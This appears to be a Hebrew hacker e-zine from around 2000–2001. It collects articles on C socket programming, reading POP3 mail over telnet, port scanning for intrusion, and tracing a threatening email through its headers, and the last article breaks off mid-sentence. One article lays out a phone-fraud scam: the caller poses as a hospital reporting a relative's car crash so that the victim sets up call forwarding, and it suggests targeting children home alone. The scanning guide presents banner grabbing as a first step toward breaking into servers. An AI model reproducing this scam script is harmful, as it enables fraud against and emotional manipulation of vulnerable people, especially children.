        unsigned char      sin_zero[8]; /* Same size as struct sockaddr */

  };

 

            struct in_adrr

            {

                        unsigned long s_addr;

            };

 

בכל מקרה זה לא צריך לעניין אותנו. מה שאנחנו צריכים לעשות זה פשוט ליצור מופעים של המבנה שיכילו את ההגדרות.

נכניס אותן:

my_addr.sin_family = AF_INET;

            my_addr.sin_port = htons(MYPORT);

    my_addr.sin_addr.s_addr = INADDR_ANY;

 

השורה הראשונה מודיעה לו שאנחנו רוצים לעבוד עם האינטרנט. בשורה השניה אנחנו מכניסים לו פורט (הפונקציה htons זה כדי לתרגם את הפורט לסדר שונה של ביטים, כמו שסוקטים אוהבים). בשורה השלישית אנחנו מכניסים אייפי, במקרה הזה זה הלוקאל (יענתו המחשב שלנו) שאנחנו נפתח אח"כ להאזנה. INADDR_ANY מוצא את הלוקאל אייפי. אם נרצה להכניס אייפי אחר נצטרך להמיר את הקידוד, ויש כמה פקודות שמטפלות באייפי ולכן אני סומכת עליכם שתקראו את המדריך באנגלית, שם כתוב הכל.

 

נגדיר כמה סוקטים (זה טיפוס integer  רגיל):

int socklstn, sockrcvd;

socklstn = socket(AF_INET,SOCK_STREAM,0);

 

נצטרך כמובן להגדיר לו על איזה פורט אנחנו רוצים שהשרת "יאזין" (יחכה להתקשרויות), אחרת הוא סתם ישב על איזה פורט רנדומלי.

 bind(socklstn,(struct sockaddr *)&my_addr, sizeof(struct sockaddr));

 

socklstn זה הסוקט המבוקש,  (struct sockaddr *)&my_addr זאת המרה שצריך לעשות מהמבנה של sockarr_in למבנה sockaddr שהיה לפניו, כי C לא מכירה במבנה sockaddr_in. הפרמטר האחרון הוא הגודל של המבנה sockaddr.

 

צריך גם להגיד כמה התקשרויות אנחנו רוצים שהשרת יאפשר. לדוגמה, אפשר להגדיר שרק 4 לקוחות יוכלו לבקש להתחבר לשרת. אח"כ השרת לא מתיר יותר התחברויות. ברגע שלקוח מתנתק מהשרת, הלקוח הבא יכול להתחבר. (First In First Out)

 

טוב אז עכשיו הכל מוכן ואנחנו מאזינים לבקשות לקוחות. אם אנחנו מוצאים אחת כזאת, נודיע לשרת שיקבל את הבקשה.

            listen(socklstn, BACKLOG);

socklstn זה לאיזה סוקט הוא מאזין, ו backlog הוא מספר ההתקשרויות המותר.

 

התקבלה בקשה. מה עושים אייתה?

sin_size = sizeof(struct sockaddr_in);

sockrcvd = accept(socklstn, &rmt_addr, &sin_size(;

 

השורה הראשונה היא פשוט הגודל של המבנה sockaddr_in שהשורה השניה צריכה.

השורה השניה מקבלת את הבקשה שהתקבלה בsocklstn. Rmt_addr זה משתנה מסוג מצביע שיכיל את הפרטים של הכתובת שמבקשת התחברות.

כל הבקשה הזאת נכנסת לתוך sockrcvd. מה שקורה בעצם, זה שהשרת מאזין על סוקט אחד (socklstn) אבל ברגע שיש בקשה הוא פותח סוקט אחר (sockrcvd) כדי לקבל אותה. כל מה שיועבר ביניהם יעבור דרך sockrcvd!!!

השרת ממשיך להאזין על socklstn!!! אם תבוא בקשה אחרת (תלוי כמה בקשות התרנו) הוא יפתח סוקט אחר לאותה בקשה וכן הלאה.

 

זהו, מרגע שהשרת קיבל את הבקשה אפשר להתחיל להעביר אינפורמציה בין שניהם.

 

אם רוצים לסגור את הסוקטים, פשוט מאוד:

shutdown(socklstn,3)

או:

close(socklstn);

 

חשוב לציין כל הפקודות מחזירות –1  במקרה של שגיאה, ומפעילות את errno.

זהו לבנתיים. מאוד בקצרה. כדאי מאוד לקרוא את המדריך באנגלית שמפרט את כל הפקודות.

 

שלכם,

Zero Cool, AKA Blood Runner.

 

התקשרויות מחשבים: חלק שני:

איך לבנות קליינט

 

“If man is one, and devil is six, then that must make me seven”.

(כתובת על שולחן בי"ס)

 

אהלןןןן לכם קוראים מתוקים ויקרים שלי. או לפחות אלה ששרדו את החלק הקודם. בואו נמשיך? J אז קודם כל, חדשוווות אני שמחה לבשר לכם כי גם השנה ייערך כנס האקרים בישראל אבל יותר צנוע משנה שעברה, כי שנה שעברה זה היה עולמי, נמשך 3 ימים, והיו אתגרים כמו הרצאות באנגלית במבטא עברי ואפילו גרמני וכל העסק עלה 60$. בנות נכנסו בחינם היהיהיהיי תקנאו. השנה זה יהיה כנראה יום אחד, ישראלי ואפילו יותר נחמד. בפעם הקודמת ההרצאות היו בלתי מובנות לחלוטין ומשעממות, אבל היו אחלה חבר'ה. השנה תוכלו לפגוש אותי! זה כבר סיבה טובה לבוא!!!  אז כל מעריציי, יאללה.

 

טוב, לעסק:

בחלק הקודם למדנו איך להאזין להתקשרויות. בחלק הזה נלמד גם איך להתקשר למחשבים אחרים. נניח שהסרבר מהפעם הקודמת מקשיב על פורט מסויים. עכשיו בואו נתקשר לפורט הזה וננסה לשלוח הודעה.

 

בוא נחשוב כמו בפעם הקודמת, מה יהיה תהליך העבודה שלנו?

דבר ראשון, לאתחל את Winsock במקרה ואתם אנשים מסכנים כמוני שהלינוקס המסכן שלהם מסרב להכיר במודם והעלים גם כונן של 2 ג'יגה כי מרוב שהמשתמשת התלהבה היא שכחה להגדיר אותו כמחיצת וינדוס.

פקודת האתחול, להזכירכם:

WSADATA info;

            if (WSAStartup(MAKEWORD(1,1), &info) != 0)

                        MessageBox(NULL, "Cannot initialize WinSock!", "WSAStartup", MB_OK);

 

כמובן, נצטרך להגדיר מופעים של המבנה sockaddr_in וליצור טיפוס מסוג שלם בשביל הסוקט:

 

int sockfd;

            struct sockaddr_in dest_addr;

            char msg[81];

dest_addr יכיל את פרטי הכתובת שאנחנו רוצים להתחבר אליה.

הפרמטר האחרון הוא מערך, שיכיל את ההודעה שאנחנו רוצים לשלוח.

 

כמו בפעם הקודמת:

sockfd = socket(AF_INET,SOCK_STREAM,0);

dest_addr.sin_family = AF_INET;

dest_addr.sin_port = htons(MYPORT);

dest_addr.sin_addr.s_addr = inet_addr(IP);

 

שזה אומר שאתחלנו את הסוקט שישמש אותנו להתחברות, והכנסנו לתוכו הגדרות שאומרות שאנחנו עובדים עם האינטרנט. הוא ינסה להתחבר לפורט MYPORT באייפי IP.

הפקודה inet_addr(IP)  נחוצה כי צריך להמיר את המספר IP, לדוגמה: 207.23.45.666 לסימון של נקודות ומספרים (numbers-and-dots notation) כי זה מה שהמחשב מבין.

 

ו-ע-כ-ש-י-ו גבירותיי ורבותיי, הרגע שכולכם חיכיתם לו

 

connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr);

 

מה זה אומר? התוכנית הנחמדה שלנו מנסה עכשיו להתחבר. לצורך זה היא תשתמש בsockfd  שזה הסוקט שאיתו אנחנו עובדים. Dest_addr  אמרנו כבר שיכיל את פרטי הסרבר (הכתובת אליה אנחנו רוצים להתחבר) וsizeof  כמו שאתם בטח יודעים, יחזיר פשוט את גודל המבנה sockaddr. ככה הולכת הפקודה, היא צריכה גם את הגודל.

עכשיו בואו נשלח את ההודעה:

 

gets(msg);

לקליטת הודעה מהמשתמש (מהמקלדת).

 

 

send(sockfd,msg,strlen(msg),0);

 

הפקודה שולחת את ההודעה msg דרך הסוקט sockfd  אל הכתובת שהגדרנו מקודם בהגדרות של sockfd (dest_addr),  strlen זה כמובן גודל ההודעה שהכרחי בעבודה עם סוקטים, וה 0 המעצבן פשוט צריך להיות שם.

 

לסגירת ההתקשרות, הפקודה שהכרנו כבר בחלק הקודם:

 

shutdown(sockfd,3);

 

וזאת תורת הסוקטים בקצרה. קל, נכון?

 

סיכום קצר כדי לעשות סדר בדברים:

למדנו איך לבנות תוכנית הנקראת סרבר. כדי לבנות סרבר פתחנו socket  להאזנה להודעות נכנסות על פורט מסויים. למדנו איך לבנות קליינט, שכדי לתקשר עם סרברים משתמש ב socket  לשליחת בקשות התקשרות לפורט מסויים. אם הסרבר מאזין לפורט 23 לדוגמה, והקליינט מבקש להתחבר לפורט 23, הסרבר יקבל את הבקשה שלו ויפתח עבור ההתקשרות socket  חדש. דרך הסוקט הזה הקליינט והסרבר שלנו ידברו ויקשקשו יחדיו עד שאחד הצדדים יסגור את ההתקשרות. הקליינט יכול לשלוח הודעה לסרבר והסרבר לקליינט. לדוגמה, אם אנחנו על שרת דואר (פורט 25) ואנחנו מקישים:

“mail from: [email protected] השרת יכול לבקש הזדהות קודם “Polite people say HELO first"

ולסרב להגיב עד שנקיש לדוגמה, HELO netvision.net.il .

 

אם אתם עדיין מבולבלים קצת, במדריך הבא אני אתן תוכנית שלמה שמשחקת עם הקליינט והסרבר ואנסה להסביר אותה. אולי אפילו ננתח אקספלוייט אחד או שניים. בקיצור, יש למה לחכות

 

חשוב לציין כל הפקודות מחזירות –1  במקרה של שגיאה, ומפעילות את errno.

 

סיימתי את שלי להערב. יאללה צ'או. נתראה בקרוב, מבטיחה.

 

שלכם,

Zero Cool, AKA,  Blood Runner.

 

קריאת E-mail  דרך טלנט

 

ש-ל-ו-ם חברים שלי!

מה המצב?

הכל אחלה? סבבה. אצלי לא. סתם. אני במצב רוח מוזר ולכן אני אכתוב לכם מדריך מוזר על איך לקרוא אימייל דרך טלנט. וברקע יש לי גם דיסק מוזר ("Bleach" של נירוונה - נחמד.. אבל לא יותר מנחמד) ואני סתם מזבלת לכם את השכל אז יאללה לעבודה...

 

אז נכון שתמיד חשבתם שיש לכם "אימייל נייד" כמו הוטמייל, אימייל.קום וכו' ו"אימייל של הבית" שכשאתם מתחברים מהבית אתם פותחים אותו דרך אאוטלוק אקספרס וכו'? אז יופי. אבל ידעתם שאפשר לפתוח אותו לא רק מהבית? בטח שידעתם! אבל ידעתם גם איך לעשות את זה? נו בשביל מה אני פה???? :)

טוב תפתחו את טלנט (telnet) ותתחברו לפורט 110 אל השרת אימייל נכנס של הספק שלכם. אם אתם לא יודעים את הכתובת, תתקשרו לספק ותשאלו. אם יש לכם את הדפים ששלחו לכם כשעשיתם מנוי אינטרנט, צריך להיות כתוב שם בתצורה של איך לסדר את התיבת אימייל. אני לדוגמה על אינטרנט זהב, אז ב hostname  אני כותבת:

in.inter.net.il

שזה השרת לאימייל נכנס שלהם. אגב, השרת לאימייל יוצא הוא, כמה מפתיע

out.inter.net.il

 

פורט 110 זה הפורט לאימייל נכנס.

אוקי.. התחברנו. מה עכשיו? טוב, זאת היתה הבעיה שלי במשך כמה שנים כי פשוט אין שם את הפקודה

Help או ? או man

כדי לתת רשימת פקודות!!! ותנסו בעצמכם לחפש באלטה-ויסטה ולא תמצאו כלום. אז למזלי פגשתי מישהו שידע את הפקודות והנה הן:

user username

תכניסו במקום username את שם המשתמש שלכם

pass password

תכניסו במקום password את הסיסמת התחברות שלכם.

עכשיו בחלק מהשרתים הוא ישר ייתן לכם רשימה של אימיילים שקיבלתם זה יראה ככה:

1 5736

2 57362

3 3822

זה אומר שיש לכם 3 אימיילים חדשים. כדי לקרוא אותם, רשמו

retr 1

כדי לקרוא את הראשונה

retr 2

כדי לקרוא את השניה וכו'.

 

השרת של אינטרנט זהב לדוגמה, אחרי שאתם מקישים שם משתמש וסיסמה ייתן לכם הודעה כזאת:

mail list drop and ready

ותצטרכו להקליד

list

כדי לראות את רשימת ההודעות. אם אין לכם אימיילים חדשים השרת ייתן את ההודעה

scan list follows

.

 

טוב. אם האימייל עובר מהר מדי ואתם לא מצליחים לקרוא אותו, פשוט תבחרו בתפריט

terminal> start logging

ותבחרו קובץ שאליו הוא יכתוב. אח"כ לכו לקובץ ותקראו משם.

 

אם אתם רוצים למחוק הודעות,

dele 1

dele 2

וכדומה.

 

סיימתם עם האימיילים? סגרו בעזרת

quit

 

טוב, לכתוב אימיילים דרך פורט 25 אתם יודעים כבר כי זה גיהנום לימד אתכם.

אם אתם רוצים ללמוד עוד על טלנט ופורטים שימושיים, לכו ל

www.happyhacker.org

אתר מומלץ ביותר! חפשו את ה

guides to mostly harmless hacking.

 

אבל מה שהסברתי פה אני לא מצאתי באף מקום. אז תרגישו מיוחדים...

ביי לכם מתוקנים שלי ותרגישו טוב

 

"all tied up and dried up forever, all fucked up and dead to the world"

           

            The Coolest Zero on Earth :)

או

                        Blood Runner

בשבילכם.

 

 

אינטיפדאת טלפונים

 

לפני כמה זמן ראיתי (נראה לי בפורום של ihc ) הודעה כזאתי:

 

אינטיפדאת טלפונים

שמעתי שיש אנשים שמתקשרים למספר טלפון מבקשים ממי שמרים את השפופרת לחייג

קוד מספרי מסויים ואחרי זה הם עושים שיחות על חשבונו.

מישהו יודע מהו הקוד ואיך משתמשים בו ?

 

אז ישבתי וחשבתי קצת ובסוף עליתי על זה. הטריק לא ייתן לך לעשות שיחות לגמרי

בחינם אלא ייתן לך לעשות שיחות חוץ במחיר של שיחות מקומיות.

 

כל העניין מבוסס על שימוש ב 71* (עקוב אחרי)

אז קודם כל נצטרך להבין איך בזק מחייבת על השרות.

נגיד שאני גר בבית א ועשיתי עקוב אחרי לבית  ב . בנדם מטלפון ג מתקשר

אלי , את התשלום על השיחה מ ג לבית שלי (  א )  המתקשר ישלם אבל על המשך

השיחה מהבית שלי למקום שעשיתי אליו עקוב אחרי אני משלם.

 

ועכשיו לקטע המעשי בואו נאמר שאני באזור 04 ורוצה להתקשר

למספר טלפון הזה - 029765432 אני פותח ספר טלפנים ורואה את הדבר הבא:

 

ירון וחנה לוי ………………………………… 0481234567

 

 

אז אני יחייג 81234567 והשיחה תלך בערך ככה:

 

אני: שלום אני מדבר עם משפחתו של ירון לוי?

האדיוט שענה לי : כן

אני: שלום , מדברים מבית החולים רמב"ם ירון נפגע בתאונת דרכים

אם אתם רוצים לדבר עם הרופא עליכם לחייג  71029765432* .

האידיוט שענה לי : טוב אני עכשיו מתקשר

אני : תודה ולהתראות.

 

******************************************************

טיפ: אם השגתם איזה שהו עותק של רשומון

תוכלו להוסיף עוד פרטים כדי שהעניין יהיה יותר משכנע

 

******************************************************

*********************************************************

עוד טיפ : רק ילדים קטנים יהיו מספיק טיפשים

להאמין לכם אז תתקשרו בשעות שהורים לא אמורים להיות בבית

*********************************************************

עכשיו אחרי שעשית את כל העניין המשעמם הזה אתה יכול

להתקשר פשוט ל 81234567 ואז אתה תופנה אוטומטית ל 029765432 .

 

הערה : לא היה לי לב לבדוק אם זה עושה שיחות לחו"ל אתם מוזמנים לנסות.

 

הכתבה  נכתבה ע"י y0g1 b3ar

 

פורט סקנינג

 

++++++++++++++++++++++++++++++++++++++++++++++++++++++

In loving memory of Douglas Adams (1952-2001)

++++++++++++++++++++++++++++++++++++++++++++++++++++++

 

לכל אלה מכם ששואלים "מי זה לעזאזל דאגלאס אדאמס" אולי

"מדריך הטרמפיסט לגלקסיה" יזכיר לכם משהו. ואם לא אז תתביישו, תתביישו,

תתביישו כי זה הדבר הכי מופרע, מצחיק, מגניב, מדליק, הכל שקיים בעולם,

ביקום ובכל השאר..

לא חשוב. ראיתי כבר אנשים שהקדישו לאהובותיהם אקספלוייטים, מתמטיקאים

ופיזיקאים שהקדישו "באהבה רבה" את הספרים המגעילים שהם כתבו לנשותיהם

(אני מאוד מצטערת, אבל אם אני הייתי במקומן הם היו עפים מהבית כבר ממזמן),

אז אני לא חושבת שזה מוזר להקדיש את הטקסט הזה לדאגלאס. וי לאב יו.

 

טוב, אז בתפריט היום סקאנינג סקאנינג ועוד קצת סקאנינג (תנסו להגיד את זה רצוף)

כי בכל הטיולים שלי בפורום גיהנום ראיתי הרבה קוראים מסורים שלנו שהתעצבנו -

למה לעזאזל אנחנו לא מלמדים אותם פורט סקנינג. אז הנה זה בא.

תשבו, תיקחו כוס קולה (אורגינלית) ובואו איתי לעולם המופלא של הפורטים.

זה יכול להיות ארוך.

חלקכם אולי יודעים חלק מהדברים, אבל סטיק וויז מי, אתם תמיד יכולים ללמוד

משהו חדש.

 

אז מה זה פורט בכלל? נניח שאתם מתחברים לאינטרנט ופותחים את התיבת אימייל שלכם,

בוא נגיד אאוטלוק אקספרס. חשבתם פעם מה קורה? המחשב שלכם בעצם מתחבר לאיזשהו

מקום על גבי השרת של האינטרנט שלכם, ובודק אם יש לכם דואל חדש. המקום הזה נקרא

פורט. הפורט של הבדיקת אימייל הוא 110, והפורט של השליחת אימייל הוא 25.

בואו ניקח עוד דוגמה: אתם פותחים את הדפדפן ואומרים לו להיכנס

ל www.foobar.com . המחשב שלכם בעצם מתחבר לפורט 80 על השרת www.foobar.com

ומציג לכם את התוכן שיש בו.

 

כמו שאתם אולי יודעים, אפשר להתחבר לפורטים ישירות דרך טלנט.

זאת אומרת, במקום להגיד לדפדפן שלכם ללכת לאתר www.foobar.com ,

אתם לוקחים את הטלנט שלכם ל www.foobar.com פורט 80.

אהה, אני רואה את הקוצים מתחילים לצמוח לכם בתחת, אבל מה יצא לנו מזה?

אם אתם רוצים לפרוץ משהו על הרשת, אתם צריכים קודם אינפורמציה.

אתם צריכים לדעת קודם כל, איזה מערכת השרת מריץ, וכל מיני תוכניות שהוא מריץ.

ככה אתם רואים איזה חורי אבטחה יש באתר ואיך אתם יכולים לחדור אליו.

 

בואו נעשה ניסיון קטן.

תפתחו את טלנט (התחל> חפש> קבצים או תיקיות> telnet - על כונן C)

ותתחברו נניח ל gehenom.cjb.net פורט 80.

עכשיו בעצם אתם פותחים את האתר מהטלנט. תנסו להקליד משהו.

תקבלו הודעת שגיאה כזאת:

 

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

ואז השרת יגיד לכם שהפקודה שהקלדתם לא חוקית.

מכאן אנחנו רק יודעים את הגרסה של ה HTML שהאתר משתמש בה,

אז זה לא הכי מועיל לנו. אבל יש מקרים שפורט 80 מוסר אינפורמציה אחרת...

אני אקח כדוגמה אתר שניסיתי אבל בגלל שיש בו מלא חורי אבטחה אני לא רוצה

שתזיקו לו (אני רוצה להזיק לו לבד :) ), אז אני אזייף את הכתובת שלו.

התחברתי ל www.foo.org.il (כתובת מזויפת) פורט 80. הקלדתי סתם משהו ואז

קיבלתי חזרה הודעת שגיאה בסגנון:

 Microsoft IIS 4.0 : Command not recognized

הו-פה! הפורט מודיע לי חגיגית שהאתר מריץ MS IIS שזו תוכנה של מייקרוסופט

לניהול ואחזקת אתרים. ויש כלל בעולם ההאקינג: אם זה מייקרוסופט, שום דבר לא

בטוח. בדברים של מייקרוסופט יש מיליוני חורי אבטחה. אם אתם מוצאים אתר

שמריץ IIS לדוגמה, לכו לחפש אקספלוייטים של IIS ותגלו שלא קשה לפרוץ אותו.

על אותו אתר, לקחתי את טלנט לפורט 21. זהו הפורט של ה FTP שזה שרת קבצים

שמאפשר לכם להיכנס ולהוריד ולהעלות (רק אם יש לכם account שם) קבצים לשרת.

טלנט מודיעה לי: microsoft FTP  ואין מאושרת ממני. בשביל ימים כאלה כיף

לקום בבוקר. :)

אבל נעזוב את זה עכשיו, כי רק על IIS ו FTP אפשר לכתוב מדריך שלם.

 

טלנטו לפורט 21 על netvision.net.il. יפתח לכם שרת ה FTP.

הקלידו user anonymous

השרת יגיד משהו בסגנון "אוקי, רק תנו לי את האימייל שלכם בתור סיסמה"

pass [email protected]

ותקבלו משהו בסגנון: user logged in

כמעט על כל שרת FTP יש חשבון (account) בשם אנונימוס שנותן לכם להיכנס ללא

צורך בסיסמה. ברוב המקרים זה לא הכי יעזור לכם לפרוץ את השרת אבל לפחות אתם

יכולים להסתכל על כמה ספריות שם ולהוריד קבצים במקרים טובים. אבל יש גם מקרים

אחרים... שוב, זה לא טקסט על FTP אז אני לא אפרט. תבקשו, אני מבטיחה לכתוב על

זה משהו.

התנתקו מהפורט באלגנטיות (Ctrl+F4 או quit).

התחברו לפורט 25 על, נניח out.inter.net.il (אינטרנט זהב). בדקו את השטח.

תסתכלו קצת מסביב. תפסתם ת'ראש? יופי.

 

עכשיו בחרו לכם אתר משלכם. תחקרו אותו, תשיגו עליו את כל האינפורמציה שאתם

יכולים. תבדקו פורטים חשובים כמו:

21 - FTP

23 - telnet  אם הפורט הזה פתוח,

זה אומר שהשרת נותן למשתמשים שלו shell account.

זה חשבון שנותן למשתמש להריץ פקודות יוניקס על השרת,

כאילו המשתמש נמצא ממש מול מערכת יוניקס.

אם הספק אינטרנט שלכם פותח את הפורט הזה,

נסו להתחבר ולהקליד את שם המשתמש והסיסמה שלכם,

ואתם יכולים להריץ כמה פקודות יוניקס חמודות כמו whois.

חבל, אבל כל ספקי האינטרנט בישראל שאני יודעת עליהם חסמו את הפורט הזה.

25 - כתיבת אימייל

79 - finger זה פורט שאם הוא פתוח, אתם יכולים להיות מאושרים. מאוד מאושרים.

דרך הפורט הזה אפשר להשיג אינפורמציה על משתמשים על הספק.

נסו להקליד finger root או אפילו סתם root לדוגמה,

כדי לקבל טינפו על המשתמש root.

לפעמים אתם תוכלו לראות גם איזה משתמשים מחוברים כרגע על השרת .

רגע, אם התוכנית הנחמדה finger יכולה להגיד לנו כלמיני דברים על כלמיני

משתמשים זה אומר שהיא יכולה לגשת לחשבונות (accounts) של אותם משתמשים!

וזה אומר שיש לה גם גישה למשתמש העל.. (root)!! לפעמים אם מקלידים משהו מוזר

בפורט הזה לדוגמה $%^$^$%^$###||\\\\Sjjh התוכנית יכולה להשתגע ו"להפיל"

אתכם ישר לתוך החשבון של ה root... אבל אל תתלהבו, זה מאוד מאוד נדיר.

וגם רוב השרתים חוסמים את הפורט הזה כי הוא מאוד עוזר לנו... :)

80 - HTTP. יענתו אתרים, נו, אתם יודעים.

110 - קריאת אימייל.

139 - שיתוף! ייאה!

 

את הרשימה השלמה של הפורטים  הידועים תוכלו להשיג ב RFC 1700

(פשוט חפשו אותו) או בכל מיני מסמכים (חפשו port list או משהו כזה).

פורטים ידועים הם מ-1 עד 1024 אם אני זוכרת נכון. אלה פורטים סטנדרטיים,

זאת אומרת שעל כל שרת פורט 25 משמש לאימייל, פורט 80 לאתר וכדומה.

פורטים מעל הערך הזה הם פורטים מוזרים יותר. :)

 

אם אתם רוצים לראות איזה פורטים פתוחים תורידו פורט סקאנר

(או תבנו לבד, זה לקח לי בדיוק 5 דקות) ותריצו סריקה. הסקאנר יחזיר לכם את

מספרי הפורטים הפתוחים. בכל זאת, עדיף גם לסרוק ידנית כי ככה אתם משיגים

יותר אינפו.

 

כשאתם מצליחים להתחבר לפורט מסויים, שימו לב לאיך שהוא מקבל אתכם.

בד"כ הוא יכתוב את השם של השרת או התוכנה שהוא מריץ או

כלמיני פרטים אחרים עליו. ככה תדעו איך לפרוץ אותו.

אל תזלזלו בהודעות שגיאה. הן יכולות לתת הרבה מאוד. תקראו אותן.

דבר ראשון כשאתם מצליחים להתחבר לפורט: נסו לקבל עזרה.

הקלידו help. אם זה לא עוזר תנסו ? או man . פורטים גבוהים יותר או כאלה שיש

להם הרבה בעיות מגינים על עצמם בזה שהם לא מסכימים לתת עזרה. וזה די מעצבן.

 

הערה: כשאתם מתחברים לפורט, השרת מריץ daemon שזאת תוכנה שמאזינה לאותו פורט

ומגיבה לקלט מסויים ממכם. סתם לידע כללי, אם תתקלו במושג הזה.

 

טיפ אחרון: רוצים לראות איזה פורטים פתוחים אצלכם? פתחו את חלון דוס (MS DOS),

והקלידו:

netstat -a

ככה תראו את כל השרתים שאתם מחוברים אליהם, שליד כל אתר כתוב הפורט שאליו

אתם מחוברים. מן הסתם תראו שם גם את ספק האינטרנט שלכם ואתרים שאתם מחוברים

אליהם באותו הרגע.

וגם אנשים שאתם מדברים אייתם באייסיקיו או במירק באותו הרגע. :) הא הא.

אם כתוב ליד הפורט established זה אומר שהפורט פתוח על השרת ומחכה לפקודות

ממכם (נניח אתר שמחכה לקלט ממכם) ואם כתוב listening הפורט פתוח אצלכם ומאזין

למשהו. כמו למשתמש אייסיקיו אחר שאתם מדברים אייתו באותו רגע.

אה, ואם אתם רואים שפורט 31337 פתוח אצלכם אז אכלתם אותה,

יש עליכם טרויאני (Back Orifice). :))))

 

יש הרבה נושאים כאן כמו פקודות FTP ודוס שלא פירטתי עליהם כי אני לא רוצה

להתיש אתכם לגמרי וגם כי אני כבר די מותשת. יאללה נמאס לי

 

have fun

i love you

always

                        שלכם

                                    Blood Runner

 

 

 

הבנת כותרות E-mail

 

"All in all is all we are"

(Kurt Cobain)

 

שיעור שני באינפורמציה בגיליון: היום נלמד על

כותרות אימייל ואיך להשיג מידע דרכן, וגם נשחק קצת עם כל מיני מחשבים בדרך.

טוב, הסיפור הוא כזה:

יום העצמאות, היה לי ערב מעצבן ולא כייפי אז מסטלתי את עצמי עם מוזיקה.

אני חוזרת מ"סוטול" של 2 אלבומים של מרילין מנסון (תאמינו לי זה יכול להקפיא

את המוח לבנאדם הכי שפוי..), מתחברת לאינטרנט, בודקת אימייל, ובום חוזרת

למציאות במכה:

 

From: [email protected]

Subject: ICQ Email Message

Date: April 6, 2000 12:03:22 PM EDT 

 

אתר גיהינום אתר מדליק אך כאשר אחד ממכם מפרסם חשבונות

בנקים של אחרים זה מבחיל ועובר את כל גבול הטעם הטוב!

 

התביישו לכם, מי אתם?

מי אתם שתפרסמו חשבונות בנקים, הבעיה שלכם שאתם לא ועמלים בשביל הכסף.

 

אין לכם ערך לכסף!!!

עוד מסמך כזה יפורסם הוא יעבור למשטרה

ודבר נוסף אם חשבון שאיכשהו קרוב אלי

אני אדאג שאתרכם יהופך שמיים וארץ!

 

דמכם בראשכם, יש לנו קשרים

ואישית אם ניתפס אחד מכם אם לא תורידו מסמך זה יפגע קשות

אתם עכשיו לא בטוחים, אתם עוסקים באש!!!

----------------------------------

Download ICQ at http://www.icq.com

 

ת'אמת? די נבהלתי בהתחלה. אבל אח"כ חטפתי קריזה - מה זה האיומים האלה?

תראו, גם אני נגד לפרסם חשבונות בנקים, אבל לאיים ככה על בחורה תמימה וצדיקה

כמוני?!?!

אוקי.. מה עכשיו? מן הסתם זה אימייל מזויף. בואו נראה מה אנחנו יכולים לגלות

עליו. בשביל זה אנחנו צריכים לראות את כל הכותרת (header) של האימייל.

באימייל.קום עושים את זה ע"י זה שלוחצים על הלינק:

Show all headers

באאטלוק אקספרס לדוגמה, עושים את זה ע"י לחיצה ימנית על ההודעה ואז בחירה

ב"מאפיינים", כרטיסיית "פרטים".

ב eudora רואים את כל הכותרת ע"י לחיצה על הכפתור "blah blah blah". :)

אז מכיוון שקראתי את ההודעה דרך אימייל.קום לחצתי על הלינק וזה מה שקיבלתי:

 

| Show all headers 

 Subject: ICQ Email Message   

 Date: April 6, 2000 12:03:22 PM EDT  

 To: [email protected]   Add to Address Book  

 CC:    

 Return-Path  <[email protected]>  

 Received  from smv347-ec.mail.com by ida437-ec.mail.com (Version 1.11) for <[email protected]>; Tue, 24 Apr 2001 08:17:27 -0400 (EDT)  

 Received  from mailgw2.netvision.net.il (mailgw2.netvision.net.il [194.90.1.9]) by smv347-ec.mail.com (8.9.3/8.9.1SMV070400) with ESMTP id IAA16497 for <[email protected]> sent by <[email protected]>; Tue, 24 Apr 2001 08:17:26 -0400 (EDT)  

 Received  from walla.co.il (ras4-p2.jlm.netvision.net.il [62.0.147.2]) by mailgw2.netvision.net.il (8.9.3/8.9.3) with SMTP id PAA26992 for <[email protected]>; Tue, 24 Apr 2001 15:19:01 +0300 (IDT)  

 Message-Id  <[email protected]>  

 MIME-Version  1.0  

 Content-Type  text/plain; charset="iso-8859-1"  

 Content-Transfer-Encoding  base64  

 X-MIME-Autoconverted  from 8bit to base64 by smv347-ec.mail.com id IAA16497  

 X-Delivery  Mail.com IDA 1.11  

 

אווו מה כל השטויות האלה? בוא נבדוק שורה שורה...

 

 Received  from smv347-ec.mail.com by ida437-ec.mail.com (Version 1.11) for <[email protected]>; Tue, 24 Apr 2001 08:17:27 -0400 (EDT)  

 

זה אומר ששרת אימייל בשם smv347-ec.mail.com קיבל את האימייל משרת

בשם ida437-ec.mail.com . שימו לב, שניהם נמצאים על mail.com,

או במילים אחרות שניהם נמצאים על אותה רשת. השערה שלי? אלה השרתים

של אימייל.קום ולכן הם לא כ"כ מעניינים אותנו כי אנחנו רוצים לדעת מאיפה

האימייל הגיע.

שימו לב שמצוין גם התאריך והגרסה של השרת (version 1.11).

רק 1.11?? זה בטח גרסה ישנה... שזה אומר, שבטח יש מלא חורי אבטחה על פורט 25

של ida437-ec.mail.com! אבל נעזוב את זה כרגע.

 

Received  from mailgw2.netvision.net.il (mailgw2.netvision.net.il [194.90.1.9]) by smv347-ec.mail.com (8.9.3/8.9.1SMV070400) with ESMTP id IAA16497 for <[email protected]> sent by <[email protected]>; Tue, 24 Apr 2001 08:17:26 -0400 (EDT) 

 

זה אומר לנו ששרת בשם mailgw2.netvision.net.il שלח את האימייל לשרת אימייל.קום

(smv347-ec.mail.com). כמו שאתם רואים מצוינת הגרסה

שהשרת מריץ (8.9.3/8.9.1SMV070400) וגם העובדה שהוא

משתמש בפרוטוקול אימייל ESTMP.

האי יפי בסוגריים הוא האי יפי של שרת האימייל וה - (ID (IAA16497

זה מספר זהות שניתן לכל אימייל שנשלח.

אני מתחילה לשער שהאימייל נשלח במקור דרך השרת mailgw2.netvision.net.il .

בואו נבדוק את השורה הבאה:

 

Received  from walla.co.il (ras4-p2.jlm.netvision.net.il [62.0.147.2]) by mailgw2.netvision.net.il (8.9.3/8.9.3) with SMTP id PAA26992 for <[email protected]>; Tue, 24 Apr 2001 15:19:01 +0300 (IDT)  

 Message-Id  <[email protected]>  

 

אווווווו! תראו מה יש לנו פה!! במבט ראשון, נראה כאילו walla.co.il הוא זה

ששלח את האימייל.. א-ב-ל בסוגריים כתובה הכתובת האמיתית ממנה נשלח האימייל:

ras4-p2.jlm.netvision.net.il

[62.0.147.2]

!!!

שימו לב שבאמייל אמיתי לא יגידו לכם שהאימייל התקבל משרת אחד אבל יכתבו

בסוגריים כתובת אחרת...

מישהו מהאי יפי הזה שלח אימייל דרך mailgw2.netvision.net.il אלי.

מישהו מסביבות ירושלים, כי כתוב jlm.

והנה הדבר הכי חשוב פה:

